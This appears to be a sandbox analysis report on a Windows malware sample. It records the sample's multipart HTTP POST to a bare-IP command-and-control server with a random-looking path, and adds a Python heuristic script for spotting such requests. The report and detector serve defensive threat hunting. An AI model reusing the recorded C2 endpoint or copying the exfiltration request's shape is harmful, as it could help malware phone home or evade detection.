Analysis

  • max time kernel
    114s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    17-07-2020 21:36

General

  • Target

    8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe

  • Size

    276KB

  • MD5

    76a61cb0e25d3af7f229c2fc6f003276

  • SHA1

    edb65619f3d5331c6167d720848fee9448193952

  • SHA256

    8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2

  • SHA512

    94474287e94ec8aade1230a01bf7e80fd00519c7f836ae3213b05ac9c4d72ba776200d071fea81ab31511dd33c5c8fbae89ac33bf8a4db0fc275a2a220de17a7

Score
1/10

Malware Config

Signatures

  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe (PID 2536, no child processes)
    Command line: "C:\Users\Admin\AppData\Local\Temp\8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe"
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses

Network

  • POST http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/
    Process: 8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe
    Remote address: 177.144.135.2:80 (geolocation: unknown)
    Request
    POST /NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/ HTTP/1.1
    Referer: http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/
    Content-Type: multipart/form-data; boundary=---------------------------673631834653321
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 177.144.135.2
    Content-Length: 4484
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 17 Jul 2020 21:36:43 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 177.144.135.2:80
    URL: http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/
    Protocol: http
    Process: 8e07e4ef903c87a039051bd86e891d95665b1724ecc817095edc210d4d5b6cb2.exe
    Sent / received: 5.4kB / 580 B (10 / 7 packets)

    HTTP Request

    POST http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/

    HTTP Response

    200
  • 239.255.255.250:1900
    Protocol: udp (SSDP multicast), 330 B, 2 packets. This is the SSDP discovery traffic a Windows guest emits on its own; it is not attributable to the sample.

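The request headers above carry several traits worth encoding as hunting heuristics: a POST to a bare IP literal with no hostname, a Referer that merely echoes the request URL, a 4484-byte multipart/form-data upload sent by an executable in %TEMP% rather than by a browser, an Internet Explorer 7 User-Agent, and a path made of random-looking mixed-case alphanumeric segments. The following Python is an added example, not part of the sandbox report or of any detection product: it parses one raw HTTP request head and returns the names of the heuristics that fire. The request text is constructed from the headers printed above (the multipart body is not on the page and is omitted); the benign control request, the heuristic names and the 12-character "random segment" threshold are the editor's own assumptions.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample input: the request head as the report prints it (no body).
SAMPLE_REQUEST = (
    "POST /NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/ HTTP/1.1\r\n"
    "Referer: http://177.144.135.2/NAAQEVv2Fucq0UeMgJS/4dyGt/69DoPHFe7bGT4DDPm/YZXNqKPo7pRL7AI6/\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------673631834653321\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
    ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: 177.144.135.2\r\n"
    "Content-Length: 4484\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign control (editor's assumption): an ordinary page fetch that
# should trip none of the heuristics.
BENIGN_REQUEST = (
    "GET /docs/index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/84.0\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, target, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def host_is_ip_literal(host):
    """True when the Host header is a bare IPv4/IPv6 literal, with or without :port."""
    if host.startswith("["):                 # [v6]:port form
        host = host[1:host.find("]")]
    elif host.count(":") == 1:               # v4:port form
        host = host.split(":")[0]
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def looks_random(segment, min_len=12):
    """Heuristic (editor's threshold): a long alphanumeric segment mixing
    upper case, lower case and digits, like the path segments in the report."""
    return (len(segment) >= min_len
            and segment.isalnum()
            and any(c.isupper() for c in segment)
            and any(c.islower() for c in segment)
            and any(c.isdigit() for c in segment))


def score_request(raw):
    """Return the names of the heuristics that fire on one raw HTTP request head."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    path = target.split("?", 1)[0]
    hits = []

    # C2 on a raw IP: no DNS lookup, nothing for a domain-reputation feed to catch.
    if host_is_ip_literal(host):
        hits.append("bare-ip-host")

    # Referer identical to the request URL: the "page" it claims to come from
    # is the endpoint being posted to, which no real navigation produces.
    referer = urlparse(headers.get("referer", ""))
    if referer.netloc == host and referer.path == path:
        hits.append("referer-equals-request")

    # A multipart upload is how this sample ships its 4484-byte payload.
    if method == "POST" and headers.get("content-type", "").startswith("multipart/form-data"):
        hits.append("multipart-post")

    # A hard-coded IE 5-8 token is a common non-browser tell.
    if re.search(r"\bMSIE [5-8]\.", headers.get("user-agent", "")):
        hits.append("legacy-ie-ua")

    segments = [s for s in path.split("/") if s]
    if any(looks_random(s) for s in segments):
        hits.append("random-looking-path")

    return hits
```

None of these heuristics is conclusive on its own; the value is in how many fire together on one request, and in pairing them with the process context the report supplies (an executable launched from %TEMP% sending the request, and a User-Agent that claims Windows NT 6.2 on a windows10_x64 guest).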
MITRE ATT&CK Matrix


Downloads

  • memory/2536-0-0x0000000002340000-0x000000000234C000-memory.dmp

    Filesize

    48KB
